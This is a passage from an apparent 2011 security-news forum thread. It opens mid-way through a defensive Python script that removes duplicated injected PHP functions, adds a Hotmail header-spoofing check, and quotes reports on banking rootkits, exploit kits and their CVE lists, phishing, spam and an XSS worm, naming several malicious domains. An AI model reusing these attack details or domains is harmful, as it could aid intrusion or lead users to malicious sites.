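    return {str(p.relative_to(root)): p.read_text(errors="replace")
            for p in root.rglob("*.php")}


def duplicated_functions(files):
    """Function name -> sorted list of files declaring it, for names that
    appear in two or more files (the redeclare symptom)."""
    where = defaultdict(list)
    for path, src in files.items():
        for name in set(FUNC_DECL.findall(src)):
            where[name].append(path)
    return {n: sorted(p) for n, p in where.items() if len(p) > 1}


def function_span(src, name):
    """(start, end) of `function name(...) {...}` in src, matching braces
    while skipping quoted strings; None if not present."""
    m = re.search(r"\bfunction\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    i = src.find("{", m.end())
    if i < 0:
        return None
    depth, quote = 0, None
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":
                i += 1                  # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0:
                return m.start(), i + 1
        i += 1
    return None


def strip_function(src, name):
    """Remove the function and any now-empty `<?php ?>` wrapper, so nothing is
    output before the original code runs (stray output breaks header())."""
    span = function_span(src, name)
    if span is None:
        return src
    out = src[:span[0]] + src[span[1]:]
    return re.sub(r"<\?php\s*\?>\s*", "", out, count=1)


def clean_tree(files):
    """Return (cleaned files, duplicates found). Only byte-identical copies are
    stripped; differing bodies are left for a human to inspect."""
    dups = duplicated_functions(files)
    cleaned = dict(files)
    for name, paths in dups.items():
        bodies = {files[p][slice(*function_span(files[p], name))] for p in paths}
        if len(bodies) != 1:
            continue
        for p in paths:
            cleaned[p] = strip_function(cleaned[p], name)
    return cleaned, dups


if __name__ == "__main__":
    for name, paths in clean_tree(SAMPLE_FILES)[1].items():
        print(name, "declared in", len(paths), "files:", paths)
```

On a real site, feed load_php_tree("/path/to/htdocs") to clean_tree, review the report, and only then write the cleaned contents back; as the post says, removing the block does not close the hole that let it in.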


2011-05-23, 22:25

64-bit banker rootkit spies on online customers
- http://www.h-online.com/security/news/item/64-bit-rootkit-spies-on-online-banking-customers-1247881.html
23 May 2011 - "... Kaspersky has discovered* another rootkit with 64-bit Windows support: a variant of the Banker rootkit is targeting the access credentials of online banking customers in Brazil. The malware is injected into systems via a hole in an obsolete version of Java and first disables the Windows User Account Control (UAC) feature so that it can go about its business without being interrupted. It then installs bogus root certificates and modifies the HOSTS file in such a way that victims trying to access the banking web site are redirected to a phishing site operated by the criminals. The injected certificate prevents the browser from issuing an alert when establishing an encrypted connection to the phishing site, and the victim is left unaware. Kaspersky says that the malware also deletes a security plug-in used by various Brazilian banks. Unusually, the malware installs a custom system driver to uninstall the security plug-in and modify the HOSTS file. On 64-bit Windows systems, this requires some effort because Microsoft's Kernel Patch Protection (PatchGuard) prevents unsigned drivers from being installed. As 64-bit Windows installations still have a relatively small market share, rootkits with 64-bit support are currently still quite rare; a 64-bit version of the Alureon/TDL rootkit was discovered last November..."
* http://www.securelist.com/en/blog/11266/Rootkit_Banker_now_also_to_64_bit


2011-05-24, 10:14

Pharmacy SPAM sucks...
- http://www.theregister.co.uk/2011/05/23/spam_economics/
23 May 2011 - "Computer scientists are advocating the targeting of card-processing middlemen as a way of clamping down on spam... the vast majority (95 per cent) of the credit card payments to unlicensed pharmaceutical sites are handled by just three payment processing firms – based in Azerbaijan, Denmark and Nevis, in the West Indies, respectively. By putting the squeeze on these firms it might be possible to choke the flow of money to spammers, making spam less profitable and, hopefully, less prevalent.
Pharmacy spam levels fluctuate but the class of junk mail has long been the biggest single category of spam. The findings came after three months of analysing spam data, broad crawling of naming and hosting infrastructures, and over 100 purchases from spam-advertised sites. The study* discovered that payment-processing for replica and software products advertised through spam was also monetised using merchant services from just a handful of banks. Spam makes up 74.8 per cent of all email messages, compared to 90 per cent last year, according to the latest statistics from Symantec, published last week. The net security firm credits botnet takedown efforts, most notably against the infamous Rustock botnet, for the decrease..."
* http://cseweb.ucsd.edu/~savage/papers/Oakland11.pdf
(16-page pdf/2.3MB)


2011-05-25, 15:42

Web-based attacks use JavaScript tricks...
- http://krebsonsecurity.com/2011/05/blocking-javascript-in-the-browser/
May 25, 2011 - "... Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. To protect yourself, it is critically important to have an easy method of selecting which sites should be allowed to run JavaScript in the browser. It is true that selectively allowing JavaScript on known, “safe” sites won’t block all malicious scripting attacks: Even legitimate sites sometimes end up running malicious code when scammers figure out ways to sneak tainted, bogus ads into the major online ad networks. But disallowing JavaScript by default and selectively enabling it for specific sites remains a much safer option than letting all sites run JavaScript unrestricted all the time... Noscript*... lets the user decide which sites should be allowed to run JavaScript, including Flash Player content. Users can choose to allow specific exceptions either permanently or for a single browsing session... Firefox... offers the most options for dealing with JavaScript. But, whichever browser you use, be aware that running JavaScript can be the point of entry for intrusive and infectious malware. Use caution before deciding to allow it on any site that you visit."
* https://addons.mozilla.org/en-US/firefox/addon/noscript/
Downloads: 85,892,086...


2011-05-25, 23:39

Fake VirusTotal site serves malware
- http://www.net-security.org/malware_news.php?id=1730
24.05.2011 - "VirusTotal - the popular free file checking website - has been spoofed by malware peddlers, warns Kaspersky Lab*. A simple -visit- to the site triggers the download of a worm via a java applet embedded in the code... Its aim is to recruit the computer it infected into a botnet that would ultimately be used to perform DDoS attacks, and to communicate to the C&C information about the system (hostname, type and version of the OS, etc.)... malware peddlers have lately begun combining the use of malicious JavaScript code and social engineering techniques, since it allows them to infect computers regardless of the browser or operating system used."
* http://www.securelist.com/en/blog/208188086/Fake_virustotal_website_propagated_java_worm
"... the website looks the same way as the original**. However, hidden in the source the parameters needed to infect the system through a java applet through which discharge completely silent malware..."
** http://www.securelist.com/en/images/pictures/klblog/208188087.png
(Screenshot at the URL above.)

(Hat tip to cnm @ spywareinfoforum.com)


2011-05-27, 01:00

Fake Epsilon phish - Breach Warning...
- http://isc.sans.edu/diary.html?storyid=10930
Last Updated: 2011-05-26 14:53:19 UTC - "... website that attempts to scare people into purchasing a credit report. The website... reminds the visitor of the relatively recent Epsilon data breach. The goal is to persuade the person into proceeding to another site that is being promoted. This looks like a technique to make money through affiliate marketing..."
(Screenshot and more detail at the URL above.)


2011-05-30, 17:44

SPAMbot stats for May 2011
- http://www.m86security.com/labs/bot_statistics.asp
Week ending May 29, 2011

- http://labs.m86security.com/2011/05/donbots-money-maker-gambling-scheme/
May 26, 2011 - "... the Donbot botnet changed its spam campaign to one promoting online casinos. The barrage of Fake AV we saw coming out of Donbot suddenly stopped and within 15 minutes we started receiving this new campaign... Upon downloading the Casino-Online.exe binary and scanning it through VirusTotal.com, 4 of 42 antivirus packages detected it, with the following results: “RealTimeGaming, CasOnline, Artemis!B7E6F50C181D, and W32/Malware.SWHU” ..."

- http://labs.m86security.com/2011/05/new-bots-old-bots-xarvester-returns/
May 24, 2011 - "... big rise in spam from two botnets well known to us from the past – Donbot and Xarvester. Six months ago, spam from these botnets hardly got our attention... someone has breathed new life into these spamming machines..."


2011-05-30, 23:36

Money mule recruiters ...
- http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_30.html
May 30, 2011 - "... currently active money mule recruitment web sites, actively recruiting money mules for the processing of fraudulently obtained funds... Currently active sites residing within AS42708, PORTLANE Network www .portlane .com; AS29713, INTERPLEXINC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, HETZNER-AS Hetzner Online... Monitoring of money mule recruitment campaigns is ongoing."
(Screenshot and more detail available at the ddanchev URL above.)

- http://www.google.com/safebrowsing/diagnostic?site=AS:42708
- http://www.google.com/safebrowsing/diagnostic?site=AS:29713
- http://www.google.com/safebrowsing/diagnostic?site=AS:38913
- http://www.google.com/safebrowsing/diagnostic?site=AS:24940


2011-06-02, 14:06

Bulk SPAM msgs... Bulker .biz...
- http://blogs.technet.com/b/mmpc/archive/2011/06/01/fake-canadian-pharma-site-causing-headaches.aspx
1 Jun 2011 - "... Yahoo email account was hacked... his email account was used to send over 20 emails with links to domains like “Canadian Neighbor Pharmacy” to his contact lists at 2:59 AM in the morning, while he was asleep... spam messages sent in bulk by a spammer... the “Canadian Neighbor Pharmacy” site is part of a list of sites promoted by an underground organization called “Bulker .biz”. This organization encourages spammers and hackers to target email recipients from domains like Yahoo.com, Aol.com, Hotmail.com, etc. The site itself functions as a front for credit card fraud and identity theft by targeting unwitting users that register an account on the site and order promoted pharmaceuticals that may never arrive... Be alert to email messages with typos or bad form and a single hyperlink with little or no explanation about the link itself..."
(Screenshots and more detail at the technet URL above.)


2011-06-03, 12:47

LinkedIn SPAM emails download malware
- http://www.trusteer.com/blog/linkedin-spam-emails-download-malware
June 02, 2011 - "LinkedIn has more than 90 million members, many of whom are business users... In the last couple of days, we've witnessed a malware campaign that targets LinkedIn users. It starts with a simple connect request sent to the victim's mailbox... If you click the "Confirm that you know" link on the genuine email, it takes you to LinkedIn's website. However if the same button is clicked on the fraudulent email, it takes you to a malicious website that downloads malware onto your computer. The fraudulent website is hxxp: //salesforceappi .com/ loginapi.php?tp=1da14085e243eaf9 ...The domain salesforceappi .com was registered two days ago and the IP address of the server is in Russia. The domain was designed to look like it's associated with Salesforce.com but in fact it has nothing to do with Salesforce .com. The malicious server uses the BlackHole exploit kit to download malware to the victim's computer... recently made available for free... It is based on PHP and has a MySQL database. Thousands of websites have been infected with BlackHole which is used to exploit vulnerabilities on visitors’ computers in order to place malware on them... drive by download... we've recently seen evidence of Zeus targeting enterprise networks in order to steal proprietary information and to gain unauthorized access to sensitive systems... Only two anti-malware solutions out of 42 detect this variant at the moment*..."
(Screenshots and more detail available at the trusteer URL above.)
* http://www.virustotal.com/file-scan/report.html?id=869579adb68399f2cadc684e49dfed0b149ee250c58e3c21845f1ee2514c5d37-1306969338
File name: file-2324493_swat
Submission date: 2011-06-01 23:02:18 (UTC)
Result: 2/42 (4.8%)

- http://labs.m86security.com/2011/06/malicious-linkedin-campaign/
June 3, 2011 - "... The messages look realistic, but the giveaway is the bogus link exposed when you hover over the confirm button... Remember, just because it looks legit, doesn’t mean it is."


2011-06-06, 14:44

Phoenix exploit kit updated...
- http://labs.m86security.com/2011/06/phoenix-exploit-kit-2-7-continues-to-be-updated/
June 4th, 2011 - "... As expected, the author of the exploit kit released a new version of the tool, version 2.7... The new pack 2.7 contains the following updates:
• JAVA exploit added – Java for Business JRE Trusted Method Chaining Remote Code Execution Vulnerability – CVE-2010-0840
Old exploits were removed, the exploit kit currently contains the following exploits:
• Windows Help and Support Center Protocol Handler Vulnerability – CVE-2010-1885
• Integer overflow in the AVM2 abcFile parser in Adobe Flash Player – CVE-2009-1869,
• Integer overflow in Adobe Flash Player 9 – CVE-2007-0071
• IEPeers Remote Code Execution – CVE-2009-0806
• Internet Explorer Recursive CSS Import Vulnerability – CVE-2010-3971
• PDF Exploit – collab. collectEmailInfo – CVE-2007-5659
• PDF Exploit – util.printf – CVE-2008-2992
• PDF Exploit – collab.geticon – CVE-2009-0927
• PDF Exploit – doc.media.newPlayer – CVE-2009-4324
• PDF Exploit – LibTIFF Integer Overflow – CVE-2010-0188
... cybercriminals use JAVA and PDF exploits, as they have become the most efficient and reliable attack vector."


2011-06-08, 20:00

Spam from Hotmail compromised accounts
- http://isc.sans.org/diary.html?storyid=11026
Last Updated: 2011-06-08 13:47:30 UTC - "We keep getting ongoing reports from readers about SPAM being sent from legitimate Hotmail accounts. Like web mail systems in general, Hotmail accounts are targeted to be able to send spam from "trusted" sources. If an e-mail is received from a friend or relative, you are much more likely to open and read it. These accounts are compromised via many ways, most commonly these days via phishing. The question always is if it is actually a compromised account, or just someone spoofing the "From" address. Hotmail adds some characteristic headers that can be used to identify the source as hotmail. While they may be faked of course, they allow you to narrow down the chances of the account being compromised. You should see a "Received" header from a hotmail.com host, using Microsoft SMTPSVC. If the e-mail was posted via the web interface, you should also see an "X-Originating-IP" header, with the IP address of the sender... Next question we get: What to do if you find out your friend's Hotmail account was compromised? If your friend is "lucky", all that happened was a phishing attack. Your friend only needs to change the password (and of course, -all- sites he uses the same password with). Worst case: Your friend is infected with malware that stole the password. Point the friend to some decent anti-malware detection, or if you are a real good friend, help with the cleanup."

Hotmail and Windows Live Hotmail
To see the full, unmangled headers in Hotmail: http://spamcop.net/fom-serve/cache/22.html
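Added here as a worked example, not code from the SANS diary or from this forum: a Python check for the two header traits the diary describes, a Received line showing a hotmail.com host with Microsoft SMTPSVC, and an X-Originating-IP header for webmail submissions. Both messages are constructed; the hostnames are invented and the addresses come from the RFC 5737 documentation ranges. As the diary notes, such headers can be forged, so a match narrows the question down rather than settling it.

```python
"""Does a message carry the header fingerprints of mail really relayed via
Hotmail? (added example; both sample messages are constructed)"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed: submitted through the webmail UI and relayed by a hotmail.com host.
GENUINE = """\
Received: from omc1-s12.blu0.hotmail.com ([192.0.2.10]) by mx.example.net with ESMTP; Wed, 8 Jun 2011 13:00:00 +0000
Received: from BLU0-SMTP120 ([192.0.2.11]) by omc1-s12.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675); Wed, 8 Jun 2011 13:00:00 +0000
X-Originating-IP: [203.0.113.7]
From: A Friend <friend@hotmail.com>
To: you@example.net
Subject: check this out

hi
"""

# Constructed: the From address is borrowed; the message never touched Hotmail.
SPOOFED = """\
Received: from mail.bulkhost.example ([198.51.100.9]) by mx.example.net with ESMTP; Wed, 8 Jun 2011 13:00:00 +0000
From: A Friend <friend@hotmail.com>
To: you@example.net
Subject: check this out

hi
"""

# A Received line written by a hotmail.com host running Microsoft's SMTP service.
HOTMAIL_RELAY = re.compile(r"by\s+\S*hotmail\.com\b.*?Microsoft SMTPSVC",
                           re.IGNORECASE | re.DOTALL)


def hotmail_fingerprint(raw_message):
    """Return the individual header findings plus a one-word verdict."""
    msg = message_from_string(raw_message)
    _, addr = parseaddr(msg.get("From", ""))
    received = msg.get_all("Received") or []
    xoip = msg.get("X-Originating-IP")
    f = {
        "from_claims_hotmail": addr.lower().endswith("@hotmail.com"),
        "relayed_by_hotmail": any(HOTMAIL_RELAY.search(h) for h in received),
        # Present only for webmail submissions; the IP the sender used.
        "originating_ip": xoip.strip().strip("[]") if xoip else None,
    }
    if f["from_claims_hotmail"] and f["relayed_by_hotmail"]:
        f["verdict"] = "consistent-with-hotmail"   # account itself may be compromised
    elif f["from_claims_hotmail"]:
        f["verdict"] = "spoofed-from"              # only the address was borrowed
    else:
        f["verdict"] = "not-hotmail"
    return f


if __name__ == "__main__":
    for label, raw in (("genuine", GENUINE), ("spoofed", SPOOFED)):
        print(label, hotmail_fingerprint(raw))
```

A "consistent-with-hotmail" result with an originating IP far from where the friend lives is the pattern that points at a compromised account rather than plain spoofing.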


2011-06-09, 16:51

PPI svcs - badness on the Web ...
- https://krebsonsecurity.com/2011/06/pay-per-install-a-major-source-of-badness/
June 9, 2011 - "... Pay-per-install (PPI) services are advertised on shadowy underground Web forums. Clients submit their malware—a spambot, fake antivirus software, or password-stealing Trojan to the PPI service, which in turn charges rates from $7 to $180 per thousand successful installations, depending on the requested geographic location of the desired victims. The PPI services also attract entrepreneurial malware distributors, or “affiliates,” hackers who are tasked with figuring out how to install the malware on victims’ machines. Typical installation schemes involve uploading tainted programs to public file-sharing networks; hacking legitimate websites in order to automatically download the files onto visitors; and quietly running the programs on PCs they have already compromised. Affiliates are credited only for successful installations, via a unique and static affiliate code stitched into the installer programs and communicated back to the PPI service after each install..."
> Continued here: http://www.technologyreview.com/computing/37705/page1/


2011-06-10, 15:48

SPAM Fake UPS e-mails - spread fake anti-virus
- http://nakedsecurity.sophos.com/2011/06/09/united-parcel-service-malware-attack-spreads-fake-anti-virus/
June 9, 2011 - "Email inboxes around the world are being spammed today with a malicious attack designed to infect Windows computers with a fake anti-virus attack. The emails claim to be notification from United Parcel Service (UPS) that a package is winging its way to your address. The cybercriminals behind the scheme hope that recipients will be intrigued enough to open the attached file, which can infect their computer with malware..."
(Screenshots available at the URL above.)


2011-06-16, 09:25

SpyEye targets airline - Bank Debit Cards...
- http://www.trusteer.com/blog/spyeye-trojan-targets-airline-website-accepts-bank-debit-card-payments
June 16, 2011 - "... a SpyEye configuration that targets users of two leading European airline travel Web sites: Air Berlin, the second largest airline in Germany (after Lufthansa) and AirPlus, the global provider of business travel services for companies. SpyEye exploits the user’s machine, not the websites, to carry out this fraud. The attack subjects are far from randomly selected, but are, we believe, carefully chosen for their criminal revenue potential. One site accepts debit card payments, while the other caters to business users... criminals targeting an Air Berlin traveller from these countries stand a good chance of obtaining the personal details of the user - including their date of birth, which is mandatory on the airline's site – as well as their bank account details... SpyEye is attempting to harvest confidential user information including username and password, and other data that is entered in the targeted web page. Since Air Berlin accepts bank debit card payments, the fraud potential is even more elevated... SpyEye injects code into the users' Web browser that claims to be an anti-fraud enhancement... In reality, of course, this is a cleverly-disguised attempt to -phish- user credentials from the unsuspecting customer of the AirPlus Web portal... traditional antivirus security mechanisms are largely unable to protect corporate users from becoming infected with SpyEye as it uses targeted reconnaissance combined with signature detection evasion techniques to get a foothold inside computers..."
(More detail available at the trusteer URL above.)


2011-06-16, 19:01

Exploit kit use on the rise
- http://research.zscaler.com/2011/06/incognito-exploit-kit.html
June 14, 2011 - "Exploit kits are becoming an increasingly popular means of spreading attacks... usage of the Blackhole exploit kit... targets multiple known vulnerabilities present in a victim's browser, increasing the probability of a successful compromise. Various exploit kits differ in the way they are packaged, designed and implemented. The most distinguishing factor among different exploit kits is how exploits are obfuscated, in order to bypass various security controls... noticed a significant increase in the usage of the Incognito exploit kit. Similar to the Blackhole exploit kit, Incognito also targets vulnerabilities in Java and Adobe products. Another item that stands out to differentiate among these exploit kits is the URL patterns used. Most of the time, the URL pattern remains the same within a given exploit kit. A quick look at malwaredomainlist shows the usage of common patterns used in URLs associated with Incognito*... multi-level attacks targeted by exploit kits are becoming a favored choice of attackers these days. More importantly, the creation of automated tools to deliver these exploits provides attackers with the opportunity to launch campaigns on a frequent basis, with limited technical knowledge."
(More detail at the zscaler URL above.)

Incognito exploit kit
* http://www.malwaredomainlist.com/mdl.php?search=Incognito+exploit+kit&colsearch=All&quantity=50

Blackhole exploit kit
- http://www.malwaredomainlist.com/mdl.php?search=Blackhole+exploit+kit&colsearch=All&quantity=50

Phoenix exploit kit
- http://www.malwaredomainlist.com/mdl.php?search=Phoenix+exploit+kit&colsearch=All&quantity=50


2011-06-18, 19:32

Fake job site SCAMS...
- http://blog.dynamoo.com/2011/06/fake-jobs-totaljob-eucom.html
17 June 2011 - "... fake job domain used for contacting potential money laundering mules, this time totaljob-eu .com which is a part of this long-running scam*..."
* http://blog.dynamoo.com/search/label/Lapatasker

- http://blog.dynamoo.com/2011/06/fake-jobs-cosulting-eucom-and-espana.html
17 June 2011 - "... more fake domains in the long-running "Lapatasker" series... The registration details have changed... but otherwise this is the same old attempt to recruit people for money laundering. Avoid..."


2011-06-20, 15:12

Outlook phishing SPAM...
- http://nakedsecurity.sophos.com/2011/06/20/outlook-phishing-form-spam/
June 20, 2011 - "... Have you received a message telling you that your account needs to be reconfigured, and requesting that you enter your username and password?... If you do make the mistake of opening the attached file, you will be presented with a form which asks you for all the information a remote hacker would need to access your email account... Don't make it easy for the phishers, the spammers, the identity thieves and hackers to break into your online accounts..."


2011-06-23, 05:52

11 new exploit modules "for your pwning pleasure"
- http://h-online.com/-1265361
22 June 2011 - "The Metasploit Project has released version 3.7.2 of its exploit framework. According to the developers, the latest release of the open source penetration testing tool includes "eleven new exploit modules and fifteen post modules for your pwning pleasure"... Metasploit's hashdump capabilities now allow users to easily steal password hashes... developers note that they should also be "considerably easier to crack". A new cachedump module that allows users to steal Windows cached password hashes has also been added. Other changes include remote registry commands for Meterpreter and updates to the egghunter payload to help it bypass data execution prevention (DEP)..."

... of course, the "whitehats" won't be the only ones using it.


2011-06-27, 20:05

Facebook likejacking SCAMS
- http://techblog.avira.com/2011/06/27/facebook-likejacking-scams/en/
June 27, 2011 - "A new series of likejacking scams are making large waves on Facebook. “Dad walks on Daughter… Embarrassing” is being sent in large numbers on Facebook... As soon as you click on the link, you must “LIKE” it and then you are -redirected- to a page where you have to repeat the experience. As unbelievable as it seems, I have seen people clicking more than once on the Like button with the hope that they will get to see the video... Another scam being sent is about an Italian TV star who seems to have problems with her dress... So, you clicked, now how to get rid of this embarrassing episode? You have to remove the post from your Wall, by clicking on the top right corner... nothing is free on the Internet, even if it seems so. Please think twice before clicking on some “interesting” pictures or videos."


2011-06-29, 14:05

XSS Attack on Sina MicroBlog
- http://community.websense.com/blogs/securitylabs/archive/2011/06/29/xss-attack-on-sina-microblog.aspx
29 Jun 2011 - "... Sina Weibo is the most popular microblog service in China, with more than 100 million registered customers. Just yesterday (28 June), Sina Weibo was attacked through an XSS exploit: more than 30,000 high profile customers were affected and sent out messages containing a malicious link... Followers who click the malicious link are redirected to a page hosted on "weibo .com/pub/star", which contains an XSS exploit to allow the execution of malicious JavaScript from www .2kt .cn... Although no malicious software was installed in this campaign, Websense reminds customers to do a simple check before you click on any suspicious URL, even if it comes from your best friends."

- http://nakedsecurity.sophos.com/2011/06/30/weibo-chinas-twitter-like-service-hit-by-worm/
June 30, 2011

- https://www.computerworld.com/s/article/9218052/Worm_hits_popular_Chinese_Twitter_like_service
June 30, 2011 - "... Affected posts displayed a malicious link with enticing messages like "Move a woman's heart with 100 lines of poetry" or "Software to listen to other people's phones." When the link was clicked, the user's own account would re-post and send out private messages circulating the malicious link again..."


2011-06-30, 12:39

SPAM to avoid...
- http://sunbeltblog.blogspot.com/2011/06/some-spam-to-avoid.html
June 29, 2011 - "...
1) "Facebook Survey Gift Invite"...
2) Paypal phish...
3) World of Warcraft phish mails..."

Social network SPAM growth...
- http://www.symantec.com/connect/blogs/social-network-attacks-surge
June 29, 2011 - "... Spam attacks via social networks grew dramatically between April and June 2011. Over this period, we monitored and analyzed social network spam attacks that used three popular social networking sites — Facebook, Twitter, and YouTube... Most of the spam originates from botnets... Most of these IP addresses were blacklisted by reputation-based technology because of their spam involvement. Along with bot activity, some spam samples are seen to be sent through hijacked user accounts and fake social network accounts created by the spammers... Social network spam uses legitimate email notification templates from the social networking sites. The message alleges that the user has some unread messages or pending invites and a fake link is provided. The bogus link will direct users to a website that forces the download of malicious binaries, purports to be selling cheap enhancement drugs and replica products, pushes fake gambling casino sites, or advertises online adult dating sites, etc... The most common subject lines used in this case are as follows:
Subject: Hi, you have notifications pending
Subject: Oops.. You have notifications pending
Subject: Hi, You have 1 new direct message
Subject: You have 2 direct message on Twitter!
Subject: YouTube Administration sent you a message: Your video has been approved
Subject: YouTube Administration sent you a message: Your video on the TOP of YouTube
Subject: Direct message from [removed]
Subject: Warning: Your inbox is full, message not accepted
Subject: [removed] sent you a message on Facebook..."
(Screenshots available at the Symantec URL above.)

SPAM volume - charted July 2010 - June 2011
- http://krebsonsecurity.com/wp-content/uploads/2011/07/symspam11.jpg


2011-07-01, 13:44

Hiloti trojan downloader infection rates triple in UK
- http://www.trusteer.com/blog/hiloti-trojan-downloader-infection-rates-triple-uk
June 30, 2011 - "Hiloti, a generic downloader trojan first seen in December 2008, has shown a dramatic increase in infection rates of PCs during June 2011. Hiloti is a generic malware downloader, meaning it typically downloads other malware, e.g. Zeus and SpyEye. Hiloti creates a malicious DLL in the Windows directory, and hacks the Windows registry to maintain its presence on an infected machine across a normal boot cycle. We suspect that a Hiloti-infecting campaign - which is quite likely to be a drive-by download infection - is now taking place, having started on June 20th... the Hiloti malware is surging to two to three times its previous level of infections*... the infection does not appear to be affecting the US and other international territories, suggesting that it is a carefully targeted attack on one or more UK banking portals..."
* http://www.trusteer.com/sites/default/files/hiloti.jpg


2011-07-02, 22:59

Google+ SPAM campaign...
- http://sunbeltblog.blogspot.com/2011/07/spammers-hone-in-on-google.html
July 02, 2011 - "... Sophos has found what we consider as, probably, the first crime ever targeting Google+: fake pharma spam... spammers didn't take long before they pushed a campaign to take advantage of Internet users badly wanting to be put in circles. It's the current "it" thing, after all. Not to mention the current perfect target of any threat attack, and spamming was the first..."
* http://nakedsecurity.sophos.com/2011/07/01/google-plus-spam/
"... clicking on the links will not take you to the new social network, but instead take you to a pharmacy website set up to sell the likes of Viagra, Cialis and Levitra to the unwary..."
(Screenshots available at the Sophos URL above.)

- https://plus.google.com/107117483540235115863/posts/PhJFJqLyRnm
Jun 29, 2011 - "We've shut down the invite mechanism for the night. Insane demand... For any who wish to leave, please remember you can always exit and take your data with you by using Google Takeout. It's your data, your relationships, your identity."

Google Plus Fuss
- http://sunbeltblog.blogspot.com/2011/07/google-plus-fuss.html
July 05, 2011

- http://www.f-secure.com/weblog/archives/00002198.html
July 6, 2011 - "... Google will be deleting all private profiles after July 31*. This is related to Google+ migration..."
* http://www.google.com/support/profiles/bin/answer.py?hl=en&answer=1192471&p=public_profile


2011-07-03, 13:54

Fake Google software emails
- http://msmvps.com/blogs/spywaresucks/archive/2011/07/02/1795605.aspx
Jul 2 2011 18:51 by sandi - Filed under: Malvertizing - "These almost fooled a family member. They’re fake. The spammers do the most basic of tracking – first by including remotely hosted pictures in the email, and by embedding the victim’s email address into URLs. If you click on the link, even if you are well aware it’s fake and don’t intend to buy anything and have your internet security set to super-ultra-paranoid, they’re still going to know who clicked on that link and you’ll get even more junk..."
(Screenshots available at the URL above.)


2011-07-05, 13:38

Resurrection of MS10-087/CVE-2010-3333 In-The-Wild
- http://labs.m86security.com/2011/07/resurrection-of-cve-2010-3333-in-the-wild/
July 5, 2011 - "During the last few weeks we’ve seen massive use of the CVE-2010-3333 vulnerability for Microsoft Office. This eight-month-old vulnerability is used in popular documents such as a document that pretends to be “President Obama’s Speech”. Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333... The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers..."

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333
Last revised: 12/21/2010
CVSS v2 Base Score: 9.3 (HIGH)

- http://www.symantec.com/business/security_response/vulnerability.jsp?bid=44652

- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880


2011-07-07, 05:16

Google dumps 11+ million .co.cc sites from search results...
- http://www.theregister.co.uk/2011/07/06/google_cans_11m_dot_co_dot_cc_sites/
6 July 2011 - "Google has removed over 11 million .co.cc websites from its search engine results pages on the basis that most of them are far too "spammy"... Google classes the firm as a "freehost", and has exercised its right to block the whole domain "if we see a very large fraction of sites on a specific freehost are spammy or low-quality", according to Matt Cutts, head of Google's web spam team... According to a recent report from the Anti-Phishing Working Group, the .cc top-level domain hosted 4,963 phishing attacks in the second half of 2010, almost twice the number found under any other extension. That was due to a large number of attacks originating from .co.cc addresses, the APWG said..."


2011-07-07, 18:14

Virus Outbreak In Progress...
- http://www.ironport.com/toc/

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Money Order Attachment - E-mail - Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23578
Fake FedEx Package Delivery Failure - E-mail- Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23577
Fake Legal Department Payment - E-mail - July 7, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23590
Fake Credit Card Overdue - E-mail - July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23589
Fake USPS Package Delivery - E-mail - Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23529
Fake UPS Package Delivery - E-mail - Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23197


2011-07-18, 18:41

SBS hacked...
- http://www.sbs.com.au/article/124519/SBS-website-statement-July-18-2011
July 18, 2011 - "Over the last 2 days, the SBS website has been the victim of a hacking attack... this source has been able to enter the site on this occasion and has inserted a link to a third party ‘malware site’. Users who may have inadvertently visited this third party malware site could then have had their machines infected with a virus depending on their security settings. SBS recommends that any site users who may be concerned about infection run a full security scan... Our digital team has been working throughout the weekend to rectify the problem and have now resolved the problem. Investigations are ongoing regarding how this issue occurred and what steps can be taken to ensure it does not happen again..."


2011-07-19, 19:52

Virus Outbreak In Progress...
- http://www.ironport.com/toc/
July 19, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Personal Loan Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23677
Fake Tax Backlog Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23679
Fake VISA Customer Services Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23678
Fake Purchase Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23662
Fake Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23660
Fake Profile Picture E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23663
Fake Image Screen Shot E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23656


2011-07-20, 03:10

Python: No such file or directory – Your site is likely compromised
- http://blog.sucuri.net/2011/07/python-no-such-file-or-directory-your-site-is-likely-compromised.html
July 18, 2011 - "If you run a WordPress site and you are seeing the following error at the top of your pages:
sh: /usr/local/bin/python: No such file or directory
It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distribution domains was broken and generating an error. So any hacked site would display that error instead of showing the spammy links... If you are unsure if your site is compromised, try doing a quick scan here:
http://sitecheck.sucuri.net ..."


2011-07-21, 20:22

m86 Security Report - 1H 2011
- http://www.m86security.com/documents/pdfs/security_labs/m86_security_labs_report_1h2011.pdf
